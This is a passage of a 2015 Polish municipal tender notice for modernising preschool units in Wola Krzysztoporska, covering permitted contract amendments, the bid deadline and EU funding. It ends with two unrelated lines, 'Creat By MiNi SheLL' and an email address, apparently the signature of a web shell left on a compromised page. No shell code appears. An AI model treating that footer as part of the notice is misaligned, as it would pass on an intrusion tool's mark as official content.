<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian  umowy w następujących przypadkach:

1) Zamawiający zastrzega sobie możliwość rezygnacji z ważnych, uzasadnionych powodów, z wykonania części zakresu robót. W takim przypadku poinformuje o tym pisemnie Wykonawcę określając zakres prac, które nie będą w ramach umowy wykonywane. Wykonawca zobowiązany jest na tej podstawie sporządzić w terminie 7 dni od daty otrzymania ww. pisma kosztorys robót nie wykonywanych, stosując stawki cenowe uwzględnione w  pomocniczym kosztorysie ofertowym, o którym mowa w  § 4  pkt 1) Umowy. Kosztorys podlega weryfikacji inspektora nadzoru inwestorskiego i musi uzyskać jego akceptację. Umowna cena ryczałtowa ulega pomniejszeniu o wartość ustaloną na podstawie zaakceptowanego kosztorysu robót, z których Zamawiający zrezygnował. Wykonawca zobowiązany jest w terminie 7 dni od daty otrzymania podpisać przygotowany przez Zamawiającego aneks przewidujący zmianę zakresu i ceny zamówienia.

2) Zamawiający przewiduje możliwość wykonania robót zamiennych lub zastosowania materiałów  zamiennych, jeżeli jest to uzasadnione ze względów technologicznych lub innych ważnych względów - np. z konieczności usunięcia wad ukrytych dokumentacji projektowej zapobiegających powstaniu wad przedmiotu umowy lub wprowadzenia nowych korzystnych rozwiązań, które nie wykraczają poza zakres przedmiotu zamówienia. Wykonawca może zastosować materiały zamienne lub wykonać roboty zamienne jedynie po zatwierdzeniu bezpośrednio przez Zamawiającego i zaopiniowaniu przez  inspektora nadzoru inwestorskiego. Roboty/materiały zamienne zostaną wyłączone z rozliczenia ryczałtowego, a ich rozliczenie odbędzie się na podstawie kosztorysu różnicowego sporządzonego z uwzględnieniem stawek cenowych zastosowanych w pomocniczym kosztorysie ofertowym Wykonawcy. Wykonywanie robót zamiennych/zastosowanie materiałów zamiennych  jest możliwe jedynie po zawarciu stosownego aneksu do umowy opisującego roboty/materiały zamienne oraz uwzględniającego zmianę wynagrodzenia z tego tytułu.

3) Zamawiający przewiduje możliwości zmiany treści umowy w przypadku zmiany przepisów podatkowych, które będą powodowały zmianę stawki VAT. W takim przypadku podatek VAT naliczony zostanie według nowej stawki i w tym zakresie spowoduje zmianę wynagrodzenia brutto.

4) Zamawiający przewiduje możliwość zmiany terminu wykonania zamówienia
- z zastrzeżeniem pkt 5) - w przypadku wystąpienia zdarzeń do zaistnienia, których Wykonawca się nie przyczynił,  których skutki uniemożliwiły wykonanie przedmiotowej umowy zgodnie z pierwotnym terminem m.in.:
- wystąpi zmiana przepisów prawnych istotnych dla realizacji przedmiotu umowy i mająca wpływ na zakres lub termin wykonania przedmiotu zamówienia,
- wystąpi przedłużenie czasu trwania procedur administracyjnych, mających wpływ na termin wykonania przedmiotu zamówienia,
-  działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie;
- przerwy w wykonywaniu robót budowlanych spowodowanej wyjątkowo niekorzystnymi warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót zgodnie ze Specyfikacją techniczną wykonania i odbioru robót. Fakt ten musi być potwierdzony pisemnie przez Inspektora Nadzoru Inwestorskiego;
- błędów w dokumentacji projektowej, w oparciu, o którą wykonywane jest zamówienie i konieczności naniesienia przez projektanta poprawek lub zmian w projekcie, które mają wpływ na termin realizacji zamówienia;
- realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań,
- jeżeli zostaną ujawnione elementy infrastruktury podziemnej, będące przyczyną kolizji, których usunięcie będzie powodowało prace dotychczas nieprzewidziane.
- wystąpią  nieprzewidziane  warunki geologiczne, archeologiczne lub terenowe.

5) Zawarcie aneksu, którego postanowienia  przewidują wydłużenia terminu realizacji zamówienia jest uzależnione od odpowiedniego przedłużenia przez Wykonawcę okresu zabezpieczenia należytego wykonania umowy oraz zabezpieczenia wniesionego na okoliczność usunięcia wad stwierdzonych w okresie rękojmi za wady (w przypadku gdy zabezpieczenie wniesione zostało w innej formie niż pieniężna).

6) Zamawiający przewiduje możliwość  zmiany terminu realizacji zamówienia z innych przyczyny niezależnych od Zamawiającego i Wykonawcy, skutkujących niemożliwością prowadzenia prac, realizacji zamówienia wynikająca z wypadków losowych, siły wyższej, działania osób trzecich lub innych przyczyn niezależnych od stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wola-krzysztoporska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wola Krzysztoporska 
Ul. Kościuszki 5
97-371 Wola Krzysztoporska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2015 godzina 12:00, miejsce: Urząd Gminy Wola Krzysztoporska 
Ul. Kościuszki 5
97-371 Wola Krzysztoporska
pok. Nr 11- sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu pn. Modernizacja oddziałów przedszkolnych przy szkołach podstawowych w Gminie Wola Krzysztoporska współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Podziałania 9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej Programu Operacyjnego Kapitał Ludzki na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com